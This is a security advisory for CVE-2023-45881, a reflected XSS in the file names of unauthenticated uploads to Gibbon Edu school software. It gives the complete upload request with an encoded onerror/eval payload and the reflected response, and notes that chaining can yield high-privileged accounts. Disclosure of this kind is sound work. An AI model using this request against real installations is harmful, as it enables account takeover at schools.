CVE number<\/strong>: CVE-2023-45881<\/p>\nDesciption<\/h3>\n
Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.<\/p>\n
A reflected XSS was found in the filename of uploaded files.
This can lead to the creation of arbitrary high privileged accounts.<\/p>\n
Proof of Concept<\/h3>\n
The application allows to upload files without prior authentication using the<\/p>\n
\/modules\/Planner\/resources_addQuick_ajaxProcess.php<\/pre>\nendpoint.<\/p>\n
The following request can be used to upload files to the server:<\/p>\n
\n
<\/span>POST<\/span> \/modules\/Planner\/resources_addQuick_ajaxProcess.php<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> localhost:8080<\/span>\n[...]<\/span>\n\n------WebKitFormBoundaryeSZWbY4RNteSpbi4\nContent-Disposition: form-data; name=\"id\"\n\nbody\n------WebKitFormBoundaryeSZWbY4RNteSpbi4\nContent-Disposition: form-data; name=\"bodyaddress\"\n\n\n------WebKitFormBoundaryeSZWbY4RNteSpbi4\nContent-Disposition: form-data; name=\"bodyfile1\"; filename=\"..\/<img src=X onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>.gif\"\nContent-Type: text\/plain\n\n<!DOCTYPE html>\n<html><h1>hello<\/h1>\/html>\n\n------WebKitFormBoundaryeSZWbY4RNteSpbi4\nContent-Disposition: form-data; name=\"bodyfile2\"\n\n\n------WebKitFormBoundaryeSZWbY4RNteSpbi4\nContent-Disposition: form-data; name=\"bodyfile3\"\n\n\n------WebKitFormBoundaryeSZWbY4RNteSpbi4\nContent-Disposition: form-data; name=\"bodyfile4\"\n\n\n------WebKitFormBoundaryeSZWbY4RNteSpbi4\nContent-Disposition: form-data; name=\"imagesAsLinks\"\n\nY\n------WebKitFormBoundaryeSZWbY4RNteSpbi4--\n<\/pre>\n<\/div>\nThe imagesAsLinks<\/strong> parameter must be set to Y<\/strong> to return HTML code.
The filename<\/em> attribute of the bodyfile1<\/strong> parameter is reflected in the response.<\/p>\nThe response of the request will look like:<\/p>\n
\n
<\/span>HTTP<\/span>\/<\/span>1.1<\/span> 200<\/span> OK<\/span>\nServer<\/span>:<\/span> Apache<\/span>\nSet-Cookie<\/span>:<\/span> G5ad8ffa23a25972f=uauluvtju3kvlave1ushepkvjo; path=\/; HttpOnly; SameSite=Lax<\/span>\n[...]<\/span>\n\n<a target='_blank' style='font-weight: bold' href='http:\/\/localhost:8080\/uploads\/2023\/07\/imgsrcXonerrorevalatobYWxlcnQoZG9jdW1lbnQuZG9tYWluKQ_Go0qk7tKRgW0S9X8.gif'><img src=X onerror=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>\n\n\n<\/pre>\n<\/div>\n <\/p>\n
[\/et_pb_text][\/et_pb_column][\/et_pb_row][et_pb_row _builder_version=\"4.23.1\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.23.1\" _module_preset=\"default\" type=\"4_4\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<\/p>\n
This vulnerability can be chained with others, resulting in an exploit path that we demonstrated in this video:<\/p>\n
[\/et_pb_text][et_pb_code _builder_version=\"4.23.1\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_margin=\"|440px||||\"]